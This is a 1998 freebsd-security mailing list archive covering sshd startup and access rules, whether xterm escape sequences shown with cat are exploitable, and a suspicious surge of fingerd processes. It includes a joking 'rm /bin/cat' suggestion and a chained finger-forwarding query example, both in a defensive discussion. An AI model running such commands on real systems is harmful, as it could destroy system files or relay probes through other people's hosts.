(envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gimli.cs.uct.ac.za (gimli.cs.uct.ac.za [137.158.128.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA22858 for ; Fri, 11 Sep 1998 00:12:22 -0700 (PDT) (envelope-from mwest@gimli.cs.uct.ac.za) Received: from mwest (helo=localhost) by gimli.cs.uct.ac.za with local-smtp (Exim 1.92 #1) id 0zHNNO-0000ut-00; Fri, 11 Sep 1998 09:12:14 +0200 Date: Fri, 11 Sep 1998 09:12:13 +0200 (SAST) From: Matthew West To: Graphic Rezidew cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <35F8BF78.4C32DBEF@rezidew.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Graphic Rezidew wrote: > looking something that's REALLY obvious) . I installed the ssh port from > 2.2.5 I had set up tcp wrappers and noticed that none of the rules for > ssh were working so I took the line for it out of /etc/inetd.conf. The sshd runs as a stand alone daemon, it is not called from inetd, so you won't find an entry for it in /etc/inetd.conf. As it's a port, there'll be an "sshd.sh" startup file in /usr/local/etc/rc.d, and it's configuration files will be in /usr/local/etc (not /etc). You'll probably want to look at the "AllowHosts" and "DenyHosts" keywords in sshd_config. --mwest@cs.uct.ac.za http://www.cs.uct.ac.za To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 00:30:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA25283 for freebsd-security-outgoing; Fri, 11 Sep 1998 00:30:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA25278 for ; Fri, 11 Sep 1998 00:30:57 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id AAA20266; Fri, 11 Sep 1998 00:30:49 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: Graphic Rezidew cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-reply-to: Your message of "Fri, 11 Sep 1998 01:13:12 CDT." <35F8BF78.4C32DBEF@rezidew.net> Date: Fri, 11 Sep 1998 00:30:48 -0700 Message-ID: <20262.905499048@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > ok, now I am just a little bit concerned about this ( maybe I'm over > looking something > that's REALLY obvious) . I installed the ssh port from 2.2.5 I had set You are, don't worry. :) > up tcp wrappers > and noticed that none of the rules for ssh were working so I took the Because you have your files in the wrong place - if you read the man page for tcpd, you'll see that the permission files live in /usr/local/etc/hosts.* > line for it out > of /etc/inetd.conf. The next day I noticed that a 'netstat -a' revealed > that sshd was > running on port 22 of my machine. I have done "grep ssh /etc/*" and come Which isn't started from inetd.conf. It's started from /usr/local/etc/rc.d/ when the system boots; nothing rogue about it. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 00:34:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA25984 for freebsd-security-outgoing; Fri, 11 Sep 1998 00:34:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from banshee.cs.uow.edu.au (banshee.cs.uow.edu.au [130.130.188.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA25961 for ; Fri, 11 Sep 1998 00:34:20 -0700 (PDT) (envelope-from ncb05@banshee.cs.uow.edu.au) Received: (from ncb05@localhost) by banshee.cs.uow.edu.au (8.9.1/8.9.1) id RAA19484; Fri, 11 Sep 1998 17:33:59 +1000 (EST) Date: Fri, 11 Sep 1998 17:33:58 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: Graphic Rezidew cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <35F8BF78.4C32DBEF@rezidew.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you installed the package or port, then there will be a startup script for it, located in /usr/local/etc/rc.d/ssh.sh or similar. Nick -- Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A "When in doubt, ask someone wiser than yourself..." -unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 00:41:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA27622 for freebsd-security-outgoing; Fri, 11 Sep 1998 00:41:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rnocserv.urc.ac.ru (rnocserv.urc.ac.ru [193.233.85.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA27483 for ; Fri, 11 Sep 1998 00:40:56 -0700 (PDT) (envelope-from anton@urc.ac.ru) Received: from urc.ac.ru (Belle.urc.ac.ru [193.233.85.55]) by rnocserv.urc.ac.ru (8.8.8/8.8.8) with ESMTP id NAA29217 for ; Fri, 11 Sep 1998 13:40:10 +0600 (ESS) (envelope-from anton@urc.ac.ru) Message-ID: <35F8D3D9.9D04E937@urc.ac.ru> Date: Fri, 11 Sep 1998 13:40:09 +0600 From: Anton Voronin Organization: URC FREEnet X-Mailer: Mozilla 4.5b1 [ru] (X11; I; FreeBSD 2.2.5-STABLE i386) X-Accept-Language: ru MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: sshd References: Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Marc Slemko wrote: > ssh isn't started from inetd.conf. > However it can be, and it is advised somewhere in its manual for a case if ssh connections are expected to be rare enough. -- Anton Voronin | Ural Regional Center of FREEnet, | Southern Ural University, Chelyabinsk, Russia http://www.urc.ac.ru/~anton | Programmer & System Administrator To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 01:10:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA00517 for freebsd-security-outgoing; Fri, 11 Sep 1998 01:10:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA00509 for ; Fri, 11 Sep 1998 01:09:57 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id JAA15353 for ; Fri, 11 Sep 1998 09:09:45 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id JAA04271 for ; Fri, 11 Sep 1998 09:09:43 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Fri, 11 Sep 1998 09:09:43 +0100 (BST) From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | > >How about something more practical? Like being able to turn off this | > >"feature". | > | > "rm /bin/cat" ^- Not very practical, it would break a lot of scripts | Cat has little to do with the issue under discussion, despite the | subject line. Escape sequences can come from talk requests, naive | write(1)-like programs or naive network clients (I have seen the first | two, and the third is likely). | | Unless I missed it, nobody has defended the xterm feature in question on | any basis except that that's how it's always been done. I also didn't | notice any reports of recent exploits. | | I'd like to hear a wider variety of opinions on the matter -- in | particular, I wonder if anyone still uses the feature for anything, and | if it's been exploited. I don't understand why you're so dismissive | about it. I think we've had enough replies on this thread - I still think it /may/ be exploitable if you had a . in your path and within the tarball was a file called xtermxterm.. but, let's drop it here before it gets out of hand :) Anyone wants to reply to this, do it privately please. Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 02:51:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA10620 for freebsd-security-outgoing; Fri, 11 Sep 1998 02:51:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hosting.doublesquare.com (hosting.doublesquare.com [195.5.128.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA10615 for ; Fri, 11 Sep 1998 02:51:20 -0700 (PDT) (envelope-from ark@eltex.ru) From: ark@eltex.ru Received: from eltex.ru (eltex-spiiras.nw.ru [195.19.204.46] (may be forged)) by hosting.doublesquare.com (8.8.8/8.8.8) with ESMTP id NAA02658; Fri, 11 Sep 1998 13:50:38 +0400 (MSD) Received: from paranoid.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with ESMTP id NAA03566; Fri, 11 Sep 1998 13:50:42 +0400 (MSD) Received: (from ark@localhost) by paranoid.eltex.spb.ru (8.8.8/8.7.3) id NAA04779; Fri, 11 Sep 1998 13:50:28 +0400 Date: Fri, 11 Sep 1998 13:50:28 +0400 Message-Id: <199809110950.NAA04779@paranoid.eltex.spb.ru> In-Reply-To: from "Steve Reid " Organization: "Klingon Imperial Intelligence Service" Subject: Re: cat exploit To: sreid@alpha.sea-to-sky.net Cc: netadmin@fastnet.co.uk, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Can't remember exact control sequences details but afair it is possible for xterm to a) set window title to whatever you want b) get it back as a responce. Steve Reid said : > I tried it several times and I couldn't get it to produce anything > other than "1;2c" and "xterm", although it did completely freeze my > xterm once (scrollbars didn't even work). > > It never seemed to embed an enter character. I have, on occasion, cat'ed > a file and seen the "zsh: command not found: xtermxtermxterm" but I > think that was caused by me typing ahead without noticing the extra > garbage on the command line. > > In any case, it looks like the worst that could happen is that a binary > named with some combination of those strings could be exectued, IF IT IS > IN YOUR PATH. I can't think of any "evil" command that can be built > using just those strings. _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNfjyY6H/mIJW9LeBAQFW6wQAs1tNY621k24Trk7y1kCx8wOHBCLVAYQ5 ym9GUsSpBd/y4brSRODb8F4bABYTeNG7/gD6pzf+/x5eh7UOUbdNPKctGQmbW+Jk lz9oNsJ8ij6jweRIPkQcTLB5rsWk/oXd7tO0wWK312g5uF5pQ3voR0/hrspGssId qWqvGTSXLsc= =1x9r -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 03:08:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA12370 for freebsd-security-outgoing; Fri, 11 Sep 1998 03:08:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hosting.doublesquare.com (hosting.doublesquare.com [195.5.128.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA12365 for ; Fri, 11 Sep 1998 03:08:41 -0700 (PDT) (envelope-from ark@eltex.ru) From: ark@eltex.ru Received: from eltex.ru (eltex-spiiras.nw.ru [195.19.204.46] (may be forged)) by hosting.doublesquare.com (8.8.8/8.8.8) with ESMTP id OAA02788; Fri, 11 Sep 1998 14:07:01 +0400 (MSD) Received: from paranoid.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with ESMTP id OAA03682; Fri, 11 Sep 1998 14:07:05 +0400 (MSD) Received: (from ark@localhost) by paranoid.eltex.spb.ru (8.8.8/8.7.3) id OAA04817; Fri, 11 Sep 1998 14:06:54 +0400 Date: Fri, 11 Sep 1998 14:06:54 +0400 Message-Id: <199809111006.OAA04817@paranoid.eltex.spb.ru> In-Reply-To: <19980910180956.A2858@mcs.net> from "Karl Denninger " Organization: "Klingon Imperial Intelligence Service" Subject: Re: terminal escape exploit (was Re: cat exploit) To: karl@denninger.net Cc: Studded@dal.net, Michael@paranoid.eltex.spb.ru, Richards@paranoid.eltex.spb.ru, <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Oh really? afair vt52 was too dumb and had no programmable keys and only responces you could get back from it were screen cursor position and some simple status info. You need vt100 at least. vt52 clones were much more widespread in communist block countries than in the rest of the world where they were quickly phased out by vt100 and higher models. ;) Karl Denninger said : > The problem is TERMINALS. > > You can't bitch that an EMULATOR does exactly what it is claimed to do - > emulate the REAL DEVICE. > > This "exploit" is so old its crusty; it is quite possible to do this on a > VT-52 (yes, a real Vt-52, you know those terminals that weighed about 100 > lbs, had a dinky little screen, were made by DEC and haven't been seen in > some 15 years? Yes, those.) _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNfj2PaH/mIJW9LeBAQGF5QP+Kh5fqocnfLrNeadq9z1/2f06Vw6tDvUq USaLykrpRg/v0a0E5EhNnmmwWFkHzw7bLT55osOKr9FmUmiaTZTymZ+CLlRhpfv1 BCyt85OJbtHOIxP0ZJ5DcOsZ+ZAn7r6+LZvxKni8E6gURtdOARhCbR1xvbjMr6PE 3+o9MGS5mLQ= =dzdt -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 03:28:59 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA14022 for freebsd-security-outgoing; Fri, 11 Sep 1998 03:28:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from office.omc.net (office.omc.net [195.185.142.22]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA14017 for ; Fri, 11 Sep 1998 03:28:56 -0700 (PDT) (envelope-from LutzRab@omc.net) Received: from lutz (lutz.omc.net [195.185.142.3]) by office.omc.net (8.9.1/8.9.1) with SMTP id MAA04513 for ; Fri, 11 Sep 1998 12:29:24 +0200 (CEST) Message-Id: <199809111029.MAA04513@office.omc.net> From: "Lutz Rabing" Organization: OMCnet IS GmbH To: security@FreeBSD.ORG Date: Fri, 11 Sep 1998 12:30:33 +0200 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: fingerd exploit Reply-to: LutzRab@omc.net References: In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.01b) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Has anybody heared of a fingerd exploit ? I found many fingerd log messages from many different destinations on one of our webservers, which is unusual. There were even 10 fingerd's running under uid 'nobody'. (fingerd has been disabled by now) Thanks, Lutz Rabing -OMCnet- Mit freundlichen Gruessen, Lutz Rabing -OMCnet- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 07:14:54 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA05427 for freebsd-security-outgoing; Fri, 11 Sep 1998 07:14:54 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA05422 for ; Fri, 11 Sep 1998 07:14:53 -0700 (PDT) (envelope-from mike@seidata.com) Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with SMTP id KAA01648; Fri, 11 Sep 1998 10:17:31 -0400 (EDT) Date: Fri, 11 Sep 1998 10:17:31 -0400 (EDT) From: Mike To: Lutz Rabing cc: security@FreeBSD.ORG Subject: Re: fingerd exploit In-Reply-To: <199809111029.MAA04513@office.omc.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Lutz Rabing wrote: > Has anybody heared of a fingerd exploit ? Yes and no... I haven't heard of a 'exploit', but I have heard conversations about finger oddities... namely I've overheard people discussing 'odd behavior on the part of finger'. I, unfortuneately, don't have much more information. The oddity did relate to multiple instances of fingerd (as you report), I believe... Do you run the vanilla finger or a variant such as secure finger? -mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 10:30:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA01473 for freebsd-security-outgoing; Fri, 11 Sep 1998 10:30:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from colin.muc.de (colin.muc.de [193.174.4.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id KAA01453 for ; Fri, 11 Sep 1998 10:30:37 -0700 (PDT) (envelope-from lutz@muc.de) Received: from tavari.muc.de ([193.174.4.22]) by colin.muc.de with SMTP id <140576-1>; Fri, 11 Sep 1998 18:02:03 +0200 Received: (from daemon@localhost) by tavari.muc.de (8.8.8/8.8.7) id SAA08916; Fri, 11 Sep 1998 18:00:50 +0200 (CEST) Received: from ripley(192.168.42.202) by morranon via smap (V2.1) id xma008914; Fri, 11 Sep 98 18:00:43 +0200 From: "Lutz Albers" To: "Graphic Rezidew" , Subject: RE: sshd Date: Fri, 11 Sep 1998 18:00:37 +0200 Message-ID: <000001bddd9d$51214220$ca2aa8c0@ripley.tavari.muc.de> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-Reply-To: <35F8BF78.4C32DBEF@rezidew.net> X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >ok, now I am just a little bit concerned about this ( maybe I'm over looking something >that's REALLY obvious) . I installed the ssh port from 2.2.5 I had set up tcp wrappers >and noticed that none of the rules for ssh were working so I took the line for it out >of /etc/inetd.conf. The next day I noticed that a 'netstat -a' revealed that sshd was >running on port 22 of my machine. I have done "grep ssh /etc/*" and come >back with only As others have told you, sshd is normaly started as a stand-alone daemon. If you do a man sshd, you'll find the following option: -i Specifies that sshd is being run from inetd. Sshd is normally not run from inetd because it needs to generate the server key before it can respond to the client, and this may take tens of seconds. Clients would have to wait too long if the key was regenerated every time. However, with small key sizes (e.g. 512) using sshd from inetd may be fea- sible hope this helps ... -- Lutz Albers, lutz@muc.de, pgp key available from Do not take life too seriously, you will never get out of it alive. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 10:47:30 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA03776 for freebsd-security-outgoing; Fri, 11 Sep 1998 10:47:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from naserv.gdl.iteso.mx (ns.iteso.mx [148.201.1.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA03771 for ; Fri, 11 Sep 1998 10:47:28 -0700 (PDT) (envelope-from cacho@naserv.gdl.iteso.mx) Received: (from cacho@localhost) by naserv.gdl.iteso.mx (8.9.0/8.9.0) id MAA07789; Fri, 11 Sep 1998 12:46:58 -0500 (CDT) Date: Fri, 11 Sep 1998 12:46:57 -0500 (CDT) From: Hector Gonzalez Jaime To: Mike cc: Lutz Rabing , security@FreeBSD.ORG Subject: Re: fingerd exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Maybe it has something to do with a message in bugtraq (like a month ago) about finger forwarding? It affected Solaris/SunOS, and it has something to do with fingerd allowing you to do this: finger user@host.one@host.two@host.three@so.on FreeBSD's fingerd lets you do this one, don't know if it hurts or not. On Fri, 11 Sep 1998, Mike wrote: > On Fri, 11 Sep 1998, Lutz Rabing wrote: > > > Has anybody heared of a fingerd exploit ? > > Yes and no... I haven't heard of a 'exploit', but I have heard > conversations about finger oddities... namely I've overheard people > discussing 'odd behavior on the part of finger'. I, unfortuneately, > don't have much more information. The oddity did relate to multiple > instances of fingerd (as you report), I believe... > > Do you run the vanilla finger or a variant such as secure finger? > > -mike > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 11:26:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA09624 for freebsd-security-outgoing; Fri, 11 Sep 1998 11:26:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Amnesiac.123.org (Amnesiac.mtl.pl [195.116.4.13]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA09616 for ; Fri, 11 Sep 1998 11:26:12 -0700 (PDT) (envelope-from mcl@mtl.pl) Received: from Amnesiac.mtl.pl (mcl@Amnesiac.mtl.pl [195.116.4.13]) by Amnesiac.123.org (8.9.1/8.9.0) with SMTP id UAA18781; Fri, 11 Sep 1998 20:25:33 +0200 (CEST) Date: Fri, 11 Sep 1998 20:25:33 +0200 (CEST) From: Michal Listos X-Sender: mcl@Amnesiac.123.org To: Hector Gonzalez Jaime cc: security@FreeBSD.ORG Subject: Re: fingerd exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Hector Gonzalez Jaime wrote: > Maybe it has something to do with a message in bugtraq (like a month ago) > about finger forwarding? It affected Solaris/SunOS, and it has something > to do with fingerd allowing you to do this: > > finger user@host.one@host.two@host.three@so.on > > FreeBSD's fingerd lets you do this one, don't know if it hurts or not. >From FreeBSD's fingerd manual page: -s Enable secure mode. Queries without a user name are rejected and forwarding of queries to other remote hosts is denied. Michal * Reincarnation: Life sucks, then you die. Then life sucks again. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 12:44:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA25455 for freebsd-security-outgoing; Fri, 11 Sep 1998 12:44:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alpha.sea-to-sky.net (alpha.sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA25404 for ; Fri, 11 Sep 1998 12:43:39 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net) Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.9.1a/8.8.7) id MAA09852; Fri, 11 Sep 1998 12:41:20 -0700 Date: Fri, 11 Sep 1998 12:41:19 -0700 (PDT) From: Steve Reid To: "Jordan K. Hubbard" cc: security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: <18171.905461424@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 10 Sep 1998, Jordan K. Hubbard wrote: > Again, what I actually said was "don't blindly cat it to your screen" > which is a perfectly valid point. If you want something which > protects you, use more or less as many others have suggested. Are ftp, telnet, rlogin, rsh, and ssh safe? What about pine, elm, mutt, mh, biff, etc? Does every program that displays data from an untrusted system have the necessary protections against terminal bombs? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 14:21:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA12232 for freebsd-security-outgoing; Fri, 11 Sep 1998 14:21:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from stage1.thirdage.com (stage1.ThirdAge.com [204.74.82.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA12222 for ; Fri, 11 Sep 1998 14:21:53 -0700 (PDT) (envelope-from jal@ThirdAge.com) Received: from gigi (gigi.ThirdAge.com [204.74.82.169]) by stage1.thirdage.com (8.8.5/8.8.5) with SMTP id OAA22328; Fri, 11 Sep 1998 14:17:17 -0700 (PDT) Message-Id: <3.0.5.32.19980911142102.009c86d0@204.74.82.151> X-Sender: jal@204.74.82.151 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Fri, 11 Sep 1998 14:21:02 -0700 To: Jay Tribick , security@FreeBSD.ORG From: Jamie Lawrence Subject: Re: cat exploit Cc: Snob Art Genre In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 09:09 AM 9/11/98 +0100, Jay Tribick wrote: > >| > >How about something more practical? Like being able to turn off this >| > >"feature". >| > >| > "rm /bin/cat" > > ^- Not very practical, it would break a lot of scripts Sigh. Most people noticed that I was being flip. >| I'd like to hear a wider variety of opinions on the matter -- in >| particular, I wonder if anyone still uses the feature for anything, and >| if it's been exploited. I don't understand why you're so dismissive >| about it. I'm dismissive of it because the behaviour has been known for a very, very long time. It is defined behaviour, and no worse than a lot of other gotchas that exist in *nix. I thought everyone learned about this by having someone else annoy them with ^Gs until they figured it out. Guess not. >I think we've had enough replies on this thread - I still think it >/may/ be exploitable if you had a . in your path and within the >tarball was a file called xtermxterm.. but, let's drop it here >before it gets out of hand :) It is 'exploitable' in ways that have nothing to do with your $PATH. Much in the same way shells are 'exploitable' because you can compromise someone's account by convincing them to run an arbitrary script you wrote (only more obscurely so). >Anyone wants to reply to this, do it privately please. I would have, if there hadn't been misconceptions to be cleared up. -j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 15:18:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA19059 for freebsd-security-outgoing; Fri, 11 Sep 1998 15:18:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA19054 for ; Fri, 11 Sep 1998 15:18:11 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id SAA09838; Fri, 11 Sep 1998 18:17:30 -0400 (EDT) Date: Fri, 11 Sep 1998 18:17:30 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Steve Reid cc: "Jordan K. Hubbard" , security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Steve Reid wrote: > On Thu, 10 Sep 1998, Jordan K. Hubbard wrote: > > Again, what I actually said was "don't blindly cat it to your screen" > > which is a perfectly valid point. If you want something which > > protects you, use more or less as many others have suggested. > > Are ftp, telnet, rlogin, rsh, and ssh safe? What about pine, elm, mutt, > mh, biff, etc? > > Does every program that displays data from an untrusted system have the > necessary protections against terminal bombs? Yes. And I think you'll find that most of these programs already do provide this service. Certainly tools like 'biff' have long since been fixed against this. Consider this to be a denial of service attack -- that is, there is a desire to have terminal-based services, and there is a desire to prevent them from being abused. Some services have long since been removed (like the ability to configure key bindings). Others have immediate uses 